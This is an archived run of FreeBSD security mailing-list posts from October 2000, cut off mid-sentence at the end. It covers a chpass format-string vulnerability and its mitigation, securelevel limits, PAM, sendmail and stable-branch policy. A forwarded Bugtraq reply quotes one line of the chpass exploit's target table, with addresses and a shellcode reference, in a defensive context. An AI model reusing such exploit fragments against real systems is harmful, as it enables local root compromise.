Wed, 4 Oct 2000 03:22:39 -0700 (PDT) Received: by static.unixfreak.org (Postfix, from userid 1000) id 780551F0D; Wed, 4 Oct 2000 03:22:39 -0700 (PDT) Subject: Re: BSD chpass (fwd) In-Reply-To: from "Andrey V. Sokolov" at "Oct 4, 2000 02:10:12 pm" To: "Andrey V. Sokolov" Date: Wed, 4 Oct 2000 03:22:39 -0700 (PDT) Cc: Dima Dorfman , Kris Kennaway , Alfred Perlstein , Mike Silbersack , security@FreeBSD.ORG From: Dima Dorfman Reply-To: dima@unixfreak.org X-Mailer: ELM [version 2.4ME+ PL61 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Message-Id: <20001004102239.780551F0D@static.unixfreak.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Hi! > Do not forget! chpass, chfn, chsh, ypchpass, ypchfn, ypchsh are hard > links! This exploit will work with any command from this set, if > little modification of exploits code is done. And since they're hard links, when you [un]set the modes for one, the others get it to. In other words, unless you go out of your way to keep chfn/chsh/etc. setuid to root, chmod 555 `which chpass` is sufficient. -- Dima Dorfman Finger dima@unixfreak.org for my public PGP key. "Reading and writing, arithmetic and grammar do not constitute education, any more than a knife, fork and spoon constitute a dinner." -- John Lubbock To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 3:23:30 2000 Delivered-To: freebsd-security@freebsd.org Received: from green.dyndns.org (localhost [127.0.0.1]) by hub.freebsd.org (Postfix) with ESMTP id 74F6337B66C; Wed, 4 Oct 2000 03:23:24 -0700 (PDT) Received: from localhost (z2i384@localhost [127.0.0.1] (may be forged)) by green.dyndns.org (8.11.0/8.11.0) with ESMTP id e94ANE507903; Wed, 4 Oct 2000 06:23:16 -0400 (EDT) (envelope-from green@FreeBSD.org) Message-Id: <200010041023.e94ANE507903@green.dyndns.org> X-Mailer: exmh version 2.2 06/23/2000 with nmh-1.0.4 To: Kris Kennaway Cc: Warner Losh , Paul Richards , cvs-committers@FreeBSD.org, freebsd-security@FreeBSD.org Subject: Re: cvs commit: src/usr.bin/finger finger.c In-Reply-To: Message from Kris Kennaway of "Tue, 03 Oct 2000 16:27:20 PDT." <20001003162720.D51546@freefall.freebsd.org> From: "Brian F. Feldman" Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 04 Oct 2000 06:23:13 -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kris Kennaway wrote: > On Tue, Oct 03, 2000 at 12:00:57PM -0600, Warner Losh wrote: > > In message <39DA182C.C70ED553@originative.co.uk> Paul Richards writes: > > : I think we should have a stable release team, that changes to the stable > > : branch should be gated through to ensure they're thouroughly tested and > > : that there's a need for them to be backported. I'd be happy to work with > > : anyone else who wants to volunteer to do that since maintaining a stable > > : version of the OS is a major issue for me with my new hat on. > > > > I'd support this strongly, both as Warner Losh, Committer and as > > Warner Losh, Security Officer. My current job uses -stable and needs > > to have it be sane at "all"[*] times, or we waste a lot of effort > > bringing in and backing out unstable versions (we do some sanity > > testing before bringing a version in, but there's only so much you can > > do). > > I think a formal MFC process may be too stifling, unless we have a > VERY responsive MFC team. Consider that we don't want the same thing > to happen as did with 3.x, where 4.0-CURRENT was allowed to diverge so > much that merging bugfixes became difficult. > > I'd settle for committers being more cautious about merging their own > changes and self-managing the process better. I was thinking of it much more in the terms of a list like "reviews@FreeBSD.org" which would be private for committers posting changes they want reviewed again just before inclusion in -STABLE and anyone who wanted to could review them (I would like to, for example). If I have "X" I want reviewed, it would be nice to have a target instead of shooting in the dark. One consolidated place for people to post need for reviews would go along way towards this goal, don't you think? -- Brian Fundakowski Feldman \ FreeBSD: The Power to Serve! / green@FreeBSD.org `------------------------------' To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 3:28:38 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 69DFD37B503; Wed, 4 Oct 2000 03:28:36 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id DAA03073; Wed, 4 Oct 2000 03:28:36 -0700 (PDT) (envelope-from kris@FreeBSD.org) Date: Wed, 4 Oct 2000 03:28:36 -0700 From: Kris Kennaway To: Matt Dillon Cc: freebsd-security@FreeBSD.ORG Subject: Re: Proposed minor mod to openssh for interactive operation Message-ID: <20001004032836.B98174@freefall.freebsd.org> References: <200009300023.e8U0NUW20137@earth.backplane.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200009300023.e8U0NUW20137@earth.backplane.com>; from dillon@earth.backplane.com on Fri, Sep 29, 2000 at 05:23:30PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Sep 29, 2000 at 05:23:30PM -0700, Matt Dillon wrote: > I have trivial patches (two minor tests), any objections to my committing > them? Also, I'm not sure whether we are trying to keep our openssh > synced with openbsd's. Does anyone know the procedure for making > changes to openssh in FreeBSD's CVS tree? You should contribute these patches back to the OpenSSH developers first - see www.openssh.com for contact details. I dont like making changes to our version of openssh unless we have to, since it makes my job harder managing the divergences when I import a new version. If you really can't get them to accept the patches, then let me know.. Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 3:40:51 2000 Delivered-To: freebsd-security@freebsd.org Received: from iclub.nsu.ru (iclub.nsu.ru [193.124.222.66]) by hub.freebsd.org (Postfix) with ESMTP id B8D7B37B503; Wed, 4 Oct 2000 03:39:53 -0700 (PDT) Received: from localhost (fjoe@localhost) by iclub.nsu.ru (8.9.3/8.9.3) with ESMTP id RAA90188; Wed, 4 Oct 2000 17:37:36 +0700 (NSS) (envelope-from fjoe@iclub.nsu.ru) Date: Wed, 4 Oct 2000 17:37:36 +0700 (NSS) From: Max Khon To: Dima Dorfman Cc: "Andrey V. Sokolov" , Kris Kennaway , Alfred Perlstein , Mike Silbersack , security@FreeBSD.org Subject: Re: BSD chpass (fwd) In-Reply-To: <20001004102239.780551F0D@static.unixfreak.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org hi, there! On Wed, 4 Oct 2000, Dima Dorfman wrote: > > Do not forget! chpass, chfn, chsh, ypchpass, ypchfn, ypchsh are hard > > links! This exploit will work with any command from this set, if > > little modification of exploits code is done. > > And since they're hard links, when you [un]set the modes for one, the > others get it to. In other words, unless you go out of your way to > keep chfn/chsh/etc. setuid to root, chmod 555 `which chpass` is > sufficient. btw here is another post to bugtraq (from our security officer) --- cut here --- From imp@VILLAGE.ORG Wed Oct 4 17:35:53 2000 Date: Tue, 3 Oct 2000 23:17:48 -0600 From: Warner Losh To: BUGTRAQ@SECURITYFOCUS.COM Subject: Re: BSD chpass In message <20001004024548.A516@dissension.net> caddis writes: : { "FreeBSD 4.0-RELEASE ", 167, 0x805023c, 0xbfbffc68, bsd_shellcode }, Just FYI, 4.1-RELEASE and newer aren't vulnerable. This problem was fixed by us in our sweep of the tree in search of the format bugs that came to light in late june. Warner Losh FreeBSD Security Officer --- cut here --- /fjoe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 5:14:26 2000 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id CBBDB37B502; Wed, 4 Oct 2000 05:14:22 -0700 (PDT) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id IAA03866; Wed, 4 Oct 2000 08:14:21 -0400 (EDT) (envelope-from robert@fledge.watson.org) Date: Wed, 4 Oct 2000 08:14:21 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: Kris Kennaway Cc: Dima Dorfman , Alfred Perlstein , Mike Silbersack , security@FreeBSD.org Subject: Re: BSD chpass (fwd) In-Reply-To: <20001004025836.A84165@freefall.freebsd.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 4 Oct 2000, Kris Kennaway wrote: > mounting is still allowed at all securelevels, so you could also null > mount over the top of /usr/bin even if /usr/bin is schg. The fact that > you can mount volumes at high securelevel seems to mean there is no > way you can protect a running system against tampering with a given > file (i.e. replacing the runtime-visible instance of a given file). > > Robert Watson would probably start talking about MAC about now :-) but > I'm not sure if this is something which should be fixed as a security > problem, or if it is just not practical to expect securelevels to > prevent run-time tampering of a given file (leaving aside the issues > of protecting the boot path against taking control of the machine at > next reboot time, which only happens as a result of incomplete > coverage of the relevant files and directories with schg) Heh, you know me too well. (Either that, or I talk too much :-). As Kris points out, securelevels are generally unable to provide the level of security that they promise without effectively crippling the system. I would generally advise that people not rely on securelevels providing more than ``best effort'' improvements in the event of a root compromise: as someone point out (Dima?), securelevels are great for confusing script kiddies, but a qualified and knowledgeable attacker can bypass their protection given root privilege. To be honest, I'd like to see the last vestiges of the securelevel concept in userland (the schg flag on some binaries) be made optional in the installworld process, as it not only doesn't provide bullet-proof protection, but does impede portable upgrades across file system types (try doing an installworld on an NFS mounted file system). The script kiddie puzzling element is certainly entertaining, but should be optional :-). There are a number of structural improvements that could be made to securelevels and our boot process to correct some of these issues, but I think a more general solution is needed. Two goals of the TrustedBSD project are to (a) reduce the target presented by the "root" user by breaking out privilege in a modular fashion, and (b) provide a system integrity policy that is capable of protecting access to privilege (especially kernel privilege) in the face of compromise of some parts of the system. Hopefully, the resulting system will be easier to use and manage than properly implemented securelevels, but I would suspect still harder to manage than a normal UNIX system. As the features will be optional, I think that's an acceptable trade-off. If there are people interested in discussing this further, I'd welcome participation in the trustedbsd-discuss mailing list :-). Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 5:42:24 2000 Delivered-To: freebsd-security@freebsd.org Received: from smtp1.mail.yahoo.com (smtp1.mail.yahoo.com [128.11.69.60]) by hub.freebsd.org (Postfix) with SMTP id 192D137B66C for ; Wed, 4 Oct 2000 05:42:20 -0700 (PDT) Received: from unknown (HELO ori) (209.88.175.222) by smtp.mail.vip.suc.yahoo.com with SMTP; 4 Oct 2000 12:42:17 -0000 X-Apparently-From: Message-ID: <041601c02e09$c8e6dbd0$2600a8c0@ori> From: "Richard Jones" To: Subject: PAM in FreeBSD Date: Wed, 4 Oct 2000 15:48:29 +0200 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0413_01C02E1A.8A650EC0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_0413_01C02E1A.8A650EC0 Content-Type: text/plain; charset="iso-8859-8-i" Content-Transfer-Encoding: quoted-printable Hi I'm a newbie to this list so if this question has been asked please = refer me to it. In the last couple of days I've been checking the PAM state in the = FreeBSD 4.1 release. Let's see if I understand exactly how PAM works: According to what was configured to it, PAM authenticates user trying to = enter the machine.=20 In order to support the PAM control on user's authentication to the = machine, there are 2 groups of applications. group 1: Those that are responsible for authenticating users (such as: = login, sshd, su, and others), are supposed to have a section (probably = ifdefed) that uses PAM to authenticate the user instead of the standard = way it uses. For instance: login can use something other then the usual = unix password to authenticate users. group 2: Those that are responsible for the actual authentication (such = as: simple unix, radius, tacplus, etc.). This application don't require = the libpam module support. The libpam itself looks very good, with a lot = of useful modules (unix, radius, tacplus, skey, kerberos, ssh, etc.).=20 Please correct me if I'm wrong. After walking through the FreeBSD sources I saw that: 1. none of the first group applications (except: login) has the support = for PAM authentication (ifdefed). 2. sshd support for PAM: I saw that there was a discussion in this = mailing list about this subject. there was a suggestion to change the = makefile to use libcrypt. does it mean the ssh-pam interaction works = after this change? My questions are: a. Is any of my assumptions/conclusions wrong? b. Is there any work done on the subject to fix it? c. How stable is PAM on FreeBSD? d. Any known problems that you know from your experience? e. Any helpful suggestions? f. I'm especially interested in PAM for using for group 1 (login and = SSH) and for group 2 (radius, tacplus, unix, ssh). Does anyone have any = experience with using them through PAM? sorry for this long mail (I'll keep track of the mailing list from now = on so this is a one timer). thanks in advance for all your help RJ. ------=_NextPart_000_0413_01C02E1A.8A650EC0 Content-Type: text/html; charset="iso-8859-8-i" Content-Transfer-Encoding: quoted-printable
Hi
 
I'm a newbie to this list = so if this=20 question has been asked please refer me to it.
 
In the last couple of = days I've been=20 checking the PAM state in the FreeBSD 4.1 release.
 
Let's see if I understand = exactly=20 how PAM works:
According to what was = configured to=20 it, PAM authenticates user trying to enter the machine.
In order to support the = PAM control=20 on user's authentication to the machine, there are 2 groups of=20 applications.
group 1: Those that are = responsible=20 for authenticating users (such as: login, sshd, su, and others), are = supposed to=20 have a section (probably ifdefed) that uses PAM to authenticate the user = instead=20 of the standard way it uses. For instance:=20 login can use something other then the usual unix password to = authenticate=20 users.
 
group 2: Those that are = responsible=20 for the actual authentication (such as: simple unix, radius, tacplus,=20 etc.). This application don't require the libpam module=20 support. The libpam itself looks very good, with a lot of useful = modules=20 (unix, radius, tacplus, skey, kerberos, ssh, etc.). 
 
Please correct me if I'm=20 wrong.
 
After walking through the = FreeBSD=20 sources I saw that:
1. none of the first = group=20 applications (except: login) has the support for PAM authentication=20 (ifdefed).
2. sshd support for PAM: = I saw that=20 there was a discussion in this mailing list about this subject. there = was a=20 suggestion to change the makefile to use libcrypt. does it mean the = ssh-pam=20 interaction works after this change?
 
 
My questions = are:
a. Is any of my=20 assumptions/conclusions wrong?
b. Is there any work done = on the=20 subject to fix it?
c. How stable is PAM on=20 FreeBSD?
d. Any known problems = that you know=20 from your experience?
e. Any helpful=20 suggestions?
f. I'm especially = interested in PAM=20 for using for group 1 (login and SSH) and for group 2 (radius, tacplus, = unix,=20 ssh). Does anyone have any experience with using them through = PAM?
 
 
sorry for this long mail = (I'll keep=20 track of the mailing list from now on so this is a one = timer).
 
thanks in advance for all = your=20 help
 
RJ.
------=_NextPart_000_0413_01C02E1A.8A650EC0-- _________________________________________________________ Do You Yahoo!? Get your free @yahoo.com address at http://mail.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 6:57:29 2000 Delivered-To: freebsd-security@freebsd.org Received: from whistle.com (s205m131.whistle.com [207.76.205.131]) by hub.freebsd.org (Postfix) with ESMTP id 1C1EA37B502 for ; Wed, 4 Oct 2000 06:57:27 -0700 (PDT) Received: (from smap@localhost) by whistle.com (8.10.0/8.10.0) id e94DvQA06427 for ; Wed, 4 Oct 2000 06:57:26 -0700 (PDT) Received: from pau-amma.whistle.com( 207.76.205.64) by whistle.com via smap (V2.0) id xma006425; Wed, 4 Oct 2000 06:57:26 -0700 Received: (from dhw@localhost) by pau-amma.whistle.com (8.11.0/8.11.0) id e94DvQc92408 for security@FreeBSD.ORG; Wed, 4 Oct 2000 06:57:26 -0700 (PDT) (envelope-from dhw) Date: Wed, 4 Oct 2000 06:57:26 -0700 (PDT) From: David Wolfskill Message-Id: <200010041357.e94DvQc92408@pau-amma.whistle.com> Subject: Re: cvs commit: src/etc inetd.conf Cc: security@FreeBSD.ORG In-Reply-To: <200010031722.NAA41823@khavrinen.lcs.mit.edu> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Date: Tue, 3 Oct 2000 13:22:27 -0400 (EDT) >From: Garrett Wollman >< said: >> gets no response (after a time-out) it would be entitled to retry a >> few times in case of packet loss. *But* if it gets a RST, which is a >If net.inet.tcp.blackhole is set, an RST will not be emitted. If the concern is that you don't want sendmail to even try to do the auth, just insert define(`confTO_IDENT', `0s')dnl in the .mc file from which the .cf is generated, and it won't do that any more. [Sorry; had hoped to respond yesterday, and got involved with oyther things. And the mail backlog may be such that someone already pointed this out; my apologies if so. dhw] Cheers, david -- David Wolfskill dhw@whistle.com UNIX System Administrator Desk: 650/577-7158 TIE: 8/499-7158 Cell: 650/759-0823 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 7:32:29 2000 Delivered-To: freebsd-security@freebsd.org Received: from puck.firepipe.net (mcut-b-167.resnet.purdue.edu [128.211.209.167]) by hub.freebsd.org (Postfix) with ESMTP id EC86537B502 for ; Wed, 4 Oct 2000 07:32:25 -0700 (PDT) Received: by puck.firepipe.net (Postfix, from userid 1000) id 469361955; Wed, 4 Oct 2000 09:32:46 -0500 (EST) Date: Wed, 4 Oct 2000 09:32:46 -0500 From: Will Andrews To: Roman Shterenzon Cc: Garrett Wollman , security@FreeBSD.ORG Subject: Re: blackhole [was: Re: cvs commit: src/etc inetd.conf] Message-ID: <20001004093246.H26605@puck.firepipe.net> Reply-To: Will Andrews Mail-Followup-To: Will Andrews , Roman Shterenzon , Garrett Wollman , security@FreeBSD.ORG References: <200010031722.NAA41823@khavrinen.lcs.mit.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from roman@xpert.com on Wed, Oct 04, 2000 at 11:11:04AM +0200 X-Operating-System: FreeBSD 4.1-STABLE i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Oct 04, 2000 at 11:11:04AM +0200, Roman Shterenzon wrote: > I found it break couple of things in gnome as well. > I still don't see any reason for gnome application to try to connect to > some ports, when even in orbitrc the ipv4 and ipv6 are disabled, but it's > a fact. > This is gnome problem however. > FreeBSD-GNOME guy, can you hear me ? :) Ade's not responsible for GNOME stupidity like that. ;-> -- Will Andrews - Physics Computer Network wench The Universal Answer to All Problems - "It has something to do with physics." -- Comic on door of Room 240, Physics Building, Purdue University To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 7:47:25 2000 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 3D69537B503; Wed, 4 Oct 2000 07:47:23 -0700 (PDT) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id KAA54350; Wed, 4 Oct 2000 10:47:15 -0400 (EDT) (envelope-from wollman) Date: Wed, 4 Oct 2000 10:47:15 -0400 (EDT) From: Garrett Wollman Message-Id: <200010041447.KAA54350@khavrinen.lcs.mit.edu> To: Kris Kennaway Cc: Dima Dorfman , Alfred Perlstein , Mike Silbersack , security@FreeBSD.ORG Subject: Re: BSD chpass (fwd) In-Reply-To: <20001004023249.B76230@freefall.freebsd.org> References: <20001004021948.A76230@freefall.freebsd.org> <20001004092758.335931F0A@static.unixfreak.org> <20001004023249.B76230@freefall.freebsd.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > I think you're right. Which is a good reason why your /usr/bin should > be schg too ;-) Actually, sappnd on all the directories which might be in (or on the way to) root's path would be enough. -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 7:48:47 2000 Delivered-To: freebsd-security@freebsd.org Received: from puck.firepipe.net (mcut-b-167.resnet.purdue.edu [128.211.209.167]) by hub.freebsd.org (Postfix) with ESMTP id D363A37B503; Wed, 4 Oct 2000 07:48:38 -0700 (PDT) Received: by puck.firepipe.net (Postfix, from userid 1000) id 7B4251955; Wed, 4 Oct 2000 09:48:58 -0500 (EST) Date: Wed, 4 Oct 2000 09:48:58 -0500 From: Will Andrews To: Alfred Perlstein Cc: Nate Williams , Kris Kennaway , Jordan Hubbard , Paul Richards , Christopher Masto , Warner Losh , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org Subject: Re: How long for -stable [ Re: cvs commit: src/usr.bin/finger finger.c ] Message-ID: <20001004094858.I26605@puck.firepipe.net> Reply-To: Will Andrews Mail-Followup-To: Will Andrews , Alfred Perlstein , Nate Williams , Kris Kennaway , Jordan Hubbard , Paul Richards , Christopher Masto , Warner Losh , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org References: <85378.970625261@winston.osd.bsdi.com> <20001003192158.A14805@freefall.freebsd.org> <200010040349.VAA27923@nomad.yogotech.com> <20001004000827.B27736@fw.wintelcom.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20001004000827.B27736@fw.wintelcom.net>; from bright@wintelcom.net on Wed, Oct 04, 2000 at 12:08:27AM -0700 X-Operating-System: FreeBSD 4.1-STABLE i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Oct 04, 2000 at 12:08:27AM -0700, Alfred Perlstein wrote: > > However, I didn't bother making the fix available because I felt it > > might give people the wrong impression. Just because *I* am willing to > > support a really old release such as FreeBSD 2, I still feel the users > > should be 'encouraged' to use newer releases. By not making those fixes > > available (which were in fact rather trivial to do), those folks who > > aren't capable of fixing the bugs will be more likely to upgrade their > > systems to a newer 'more supported' release. > > > > I think supporting older releases *really* needs to be done by a > > commercial entity (or at least folks who have a commercial stake in > > seeing it done), since the majority of developers are in it for the > > development fun, and product support is all but fun. :( > > I think it's a bit selfish of you to keep these fixes to yourself, > and it's the wrong attitude to have especially if you're confident > about a fix, there's always people stuck with ancient releases in > production and could use the help. I agree with Alfred, and think that this sort of "social engineering" is not acceptable in a project like this. -- Will Andrews - Physics Computer Network wench The Universal Answer to All Problems - "It has something to do with physics." -- Comic on door of Room 240, Physics Building, Purdue University To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 7:57:15 2000 Delivered-To: freebsd-security@freebsd.org Received: from hub.lovett.com (hub.lovett.com [216.60.121.161]) by hub.freebsd.org (Postfix) with ESMTP id DCB0237B503 for ; Wed, 4 Oct 2000 07:57:10 -0700 (PDT) Received: from ade by hub.lovett.com with local (Exim 3.16 #1) id 13gpya-00023J-00; Wed, 04 Oct 2000 09:56:56 -0500 Date: Wed, 4 Oct 2000 09:56:56 -0500 From: Ade Lovett To: Roman Shterenzon Cc: security@FreeBSD.ORG Subject: Re: blackhole [was: Re: cvs commit: src/etc inetd.conf] Message-ID: <20001004095656.C5318@FreeBSD.org> References: <200010031722.NAA41823@khavrinen.lcs.mit.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from roman@xpert.com on Wed, Oct 04, 2000 at 11:11:04AM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Oct 04, 2000 at 11:11:04AM +0200, Roman Shterenzon wrote: > I found it break couple of things in gnome as well. > I still don't see any reason for gnome application to try to connect to > some ports, when even in orbitrc the ipv4 and ipv6 are disabled, but it's > a fact. > This is gnome problem however. > FreeBSD-GNOME guy, can you hear me ? :) You're right, it's a GNOME problem. Head over to http://bugs.gnome.org/, and fill out a bug report detailing all the information you neglected to mention here, and I'm sure they'll go fix it in an appropriate manner. "gnome application" and "some ports" is kinda hazy. HTH. HAND. -aDe -- Ade Lovett, Austin, TX. ade@FreeBSD.org FreeBSD: The Power to Serve http://www.FreeBSD.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 8:11:50 2000 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id C628637B502 for ; Wed, 4 Oct 2000 08:11:33 -0700 (PDT) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id IAA11420; Wed, 4 Oct 2000 08:10:44 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda11418; Wed Oct 4 08:10:30 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.0/8.9.1) id e94FATb33819; Wed, 4 Oct 2000 08:10:29 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdm33806; Wed Oct 4 08:09:30 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.0/8.9.1) id e94F9Tx35480; Wed, 4 Oct 2000 08:09:29 -0700 (PDT) Message-Id: <200010041509.e94F9Tx35480@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdt35459; Wed Oct 4 08:08:44 2000 X-Mailer: exmh version 2.1.1 10/15/1999 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.1-RELEASE X-Sender: cy To: Bill Fumerola Cc: Chris Wasser , freebsd-security@FreeBSD.ORG Subject: FreeBSD History In-reply-to: Your message of "Tue, 03 Oct 2000 16:07:46 EDT." <20001003160745.A38472@jade.chc-chimes.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 04 Oct 2000 08:08:44 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <20001003160745.A38472@jade.chc-chimes.com>, Bill Fumerola writes: > On Tue, Oct 03, 2000 at 12:50:25PM -0600, Chris Wasser wrote: > > > Sometime we are forced to work with people we may not get along > > with, this is how life works. It surprises me that the core team > > would degrade into a school-yard fight over the actions of one > > person, isn't this what happened to NetBSD/OpenBSD? Are we headed > > along that road now? > > The OpenBSD/NetBSD split occured because someone with content and > clue had a disagreement. Luckily, bitching and whining will never > magically generate code, so I wouldn't worry. How did FreeBSD get started? Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 8:32:28 2000 Delivered-To: freebsd-security@freebsd.org Received: from blues.jpj.net (blues.jpj.net [204.97.17.146]) by hub.freebsd.org (Postfix) with ESMTP id F27B137B502 for ; Wed, 4 Oct 2000 08:32:25 -0700 (PDT) Received: from localhost (trevor@localhost) by blues.jpj.net (right/backatcha) with ESMTP id e94FWN808950; Wed, 4 Oct 2000 11:32:23 -0400 (EDT) Date: Wed, 4 Oct 2000 11:32:23 -0400 (EDT) From: Trevor Johnson To: Cy Schubert - ITSD Open Systems Group Cc: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD History In-Reply-To: <200010041509.e94F9Tx35480@cwsys.cwsent.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > How did FreeBSD get started? See /usr/share/doc/en_US.ISO_8859-1/books/handbook/history.html . -- Trevor Johnson http://jpj.net/~trevor/gpgkey.txt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 8:47:48 2000 Delivered-To: freebsd-security@freebsd.org Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id 2D07037B66C for ; Wed, 4 Oct 2000 08:47:43 -0700 (PDT) Received: from 149.211.6.64.reflexcom.com ([64.6.211.149]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Wed, 4 Oct 2000 08:46:17 -0700 Received: (from cjc@localhost) by 149.211.6.64.reflexcom.com (8.11.0/8.11.0) id e94FlTH79475 for freebsd-security@freebsd.org; Wed, 4 Oct 2000 08:47:29 -0700 (PDT) (envelope-from cjc) Date: Wed, 4 Oct 2000 08:47:29 -0700 From: "Crist J . Clark" To: freebsd-security@freebsd.org Subject: Fwd: eth-security : ANNOUNCE : Resources no for ALL Message-ID: <20001004084729.C25121@149.211.6.64.reflexcom.com> Reply-To: cjclark@alum.mit.edu Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In the recent flame storms on -security, it may have slipped by when I was deleting threads and certain authors (who will remain nameless) without looking at the contents, but I have not seen any mention of this. This was posted to BugTraq yesterday. It is a series of patches to restrict certain information from 